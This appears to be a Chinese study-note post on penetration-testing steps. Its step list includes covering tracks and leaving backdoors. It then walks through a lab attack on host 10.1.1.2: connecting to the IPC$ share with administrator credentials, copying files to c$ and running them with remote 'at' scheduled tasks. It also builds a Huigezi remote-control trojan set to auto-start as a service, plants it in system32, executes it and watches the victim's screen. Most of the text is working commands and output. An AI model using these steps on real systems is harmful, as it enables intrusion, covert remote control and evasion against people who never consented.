网络安全学习--渗透测试简单测试流程和灰鸽子简单使用

渗透测试流程

1. 授权
2. 信息收集
3. 扫描漏洞
4. 漏洞利用
5. 提权
6. 毁尸灭迹
7. 留后门
8. 渗透测试报告

通过PortScan软件扫描IP段的开放端口

445漏洞利用之IPC$

#将网络共享盘映射至本地
C:\Documents and Settings\Administrator>net use f: \\10.1.1.2\share 123456 /user
:administrator
命令成功完成。
#查看本地映射情况
F:\>net use
会记录新的网络连接。


状态       本地        远程                      网络

-------------------------------------------------------------------------------
OK           F:        \\10.1.1.2\share          Microsoft Windows Network
命令成功完成。
#删除映射
F:\>net use f: /del
在与 f: 的连接中，有打开的文件和/或没有结束的目录搜索。

是否继续断开连接并强行关闭? (Y/N) [N]: y
f: 已经删除。
#建立空连接
C:\Documents and Settings\Administrator>net use \\10.1.1.2\ipc$ 123456 /user:adm
inistrator
#查看远程主机上的信息，必须先建立空连接
C:\Documents and Settings\Administrator>dir \\10.1.1.2\c$
 驱动器 \\10.1.1.2\c$ 中的卷没有标签。
 卷的序列号是 E476-168C

 \\10.1.1.2\c$ 的目录

2021-11-20  22:45                 0 AUTOEXEC.BAT
2021-11-20  22:45                 0 CONFIG.SYS
2021-11-20  22:47    <DIR>          Documents and Settings
2021-11-20  22:48    <DIR>          Program Files
2021-12-04  07:21    <DIR>          share
2021-11-20  22:49    <DIR>          WINDOWS
2021-11-20  22:45    <DIR>          wmpub
               2 个文件              0 字节
               5 个目录 40,574,963,712 可用字节
#将文件拷贝至远程电脑，必须先建立空连接
C:\Documents and Settings\Administrator>copy c:\test.bat \\10.1.1.2\c$\windows\
已复制         1 个文件。
C:\Documents and Settings\Administrator>time
当前时间:  8:22:48.20
输入新时间:

C:\Documents and Settings\Administrator>net time \\10.1.1.2
\\10.1.1.2 的当前时间是 2021-12-4 8:23

命令成功完成。
#添加一项计划任务
C:\Documents and Settings\Administrator>at \\10.1.1.2 8:25 "c:\windows\test.bat"

新加了一项作业，其作业 ID = 1
#查看计划任务
C:\Documents and Settings\Administrator>at \\10.1.1.2
状态 ID     日期                    时间          命令行
-------------------------------------------------------------------------------
        1   今天                    8:30          c:\windows\test.bat

通过灰鸽子软件控制远程主机

• 打开灰鸽子远程控制软件，制作一个木马程序，选择配置服务程序，打开以下页面，IP设置当前机器IP，保存路径为木马程序保存位置
  
• 选择木马程序安装后的路径和安全后的程序图标
  
• 将木马设置为服务自启动
  

#将木马程序拷贝至远程电脑，前提是先建立IPC连接
C:\Documents and Settings\Administrator\桌面>copy test.exe \\10.1.1.2\c$\windows
\system32\
已复制         1 个文件。

C:\Documents and Settings\Administrator\桌面>time
当前时间:  8:48:01.26
输入新时间:

C:\Documents and Settings\Administrator\桌面>net time \\10.1.1.2
\\10.1.1.2 的当前时间是 2021-12-4 8:48

命令成功完成。
#通过计划任务，运行木马
C:\Documents and Settings\Administrator\桌面>at \\10.1.1.2 8:51 "c:\windows\syst
em32\test.exe"
新加了一项作业，其作业 ID = 1

C:\Documents and Settings\Administrator\桌面>at \\10.1.1.2
状态 ID     日期                    时间          命令行
-------------------------------------------------------------------------------
        1   今天                    8:51          c:\windows\system32\test.exe

• 木马执行完成后，在自动上线主机项，可以看到安装了木马的主机
  
• 可以通过捕获屏幕，查看安装了木马的电脑